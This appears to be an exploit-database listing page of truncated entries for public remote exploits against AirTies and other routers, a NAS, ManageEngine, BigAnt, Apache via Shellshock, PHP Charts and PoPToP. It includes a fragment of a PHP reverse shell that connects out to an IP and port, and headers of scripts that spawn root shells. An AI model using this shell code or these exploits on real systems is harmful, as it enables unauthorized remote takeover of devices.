MiniUPnPd 1.0 Stack Overflow

!/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies RT-204v3 CVE : 2013-0230 Exploit gives a reverse shell to...

MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series

MiniUPnPd 1.0 MIPS - Remote Stack Overflow Remote Code Execution for AirTies RT Series !/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture:...

MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS) Exploit

Exploit for multiple platform in category remote exploits !/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies...

MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series

!/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies RT-204v3 CVE : 2013-0230 Exploit gives a reverse shell to...

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

Airties-Air5650TT-Remote

Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: [email protected] Twitter: @batuhanburakcin...

Airties Air5650TT - Remote Stack Overflow Exploit

Exploit for multiple platform in category remote exploits !/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: email protected Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import...

Airties Air5650TT - Remote Stack Overflow

Airties Air5650TT - Remote Stack Overflow !/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: [email protected] Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import socket...

Airties Air5650TT - Remote Stack Overflow

!/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: [email protected] Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import socket, struct import urllib, urllib2, httplib i...

Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development

Exploit Pack, is an open source GPLv3 security tool, this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Iimpact are ready to use as well but you will require an expensive license to get access to all the...

Sitecom-MD-25x

Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version: 2.4.17 and below...

ManageEngine-5.5

The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse, the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user, which makes a remote shell with root/SYSTEM privileges...

BigAnt-Server-2.52-SP5-SEH

Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian - expsrv.dll 6.0.9589 Info: Vulnerability...

Apache mod_cgi - Remote Exploit (Shellshock)

No description provided by source. ! /usr/bin/env python from socket import from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage: print """ Shellshock apache modcgi remote exploit Usage: ./exploit.py var=value Vars: rhost: vict...

Apache mod_cgi Remote Command Execution

! /usr/bin/env python from socket import from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage: print """ Shellshock apache modcgi remote exploit Usage: ./exploit.py var= Vars: rhost: victim host rport: victim port for TCP shell...

Exploit for OS Command Injection in Gnu Bash

BadBash ======= CVE-2014-6271 ShellShock RCE PoC tool =====...

ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure Vulnerability

No description provided by source. Introduction to the PoC : ====================================================================== In this distribution, the managment website is a binary file named kerbynet interpreted in cgi-bin directory here : /cdrom/usr/local/apache2/cgi-bin/kerbynet So all...

PHP Charts 1.0 (index.php, type param) - Remote Code Execution

No description provided by source. !/usr/bin/python Original Advisory came from: http://packetstormsecurity.com/files/119582/PHP-Charts-1.0-Code-Execution.html infodox - insecurety.net import requests import random import threading import sys def genpayloadhost, port: Perl Reverse Shell Generator...

Quick Player 1.2 - Unicode Buffer Overflow Exploit

No description provided by source. !/usr/bin/python Vulnerability : Quick Player v1.2 unicode buffer overflow exploit coded by : mrme reference : http://www.exploit-db.com/exploits/10759 corelanc0d3r Tested on : XP SP3 En VirtualBox Greetz to : Corelan Security...

PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit

No description provided by source. / exploit for a recently discovered vulnerability in PoPToP PPTP server under Linux. Versions affected are all prior to 1.1.4-b3 and 1.1.3-20030409. The exploit is capable of bruteforcing the RET address to find our buffer in the stack. Upon a successfull run it...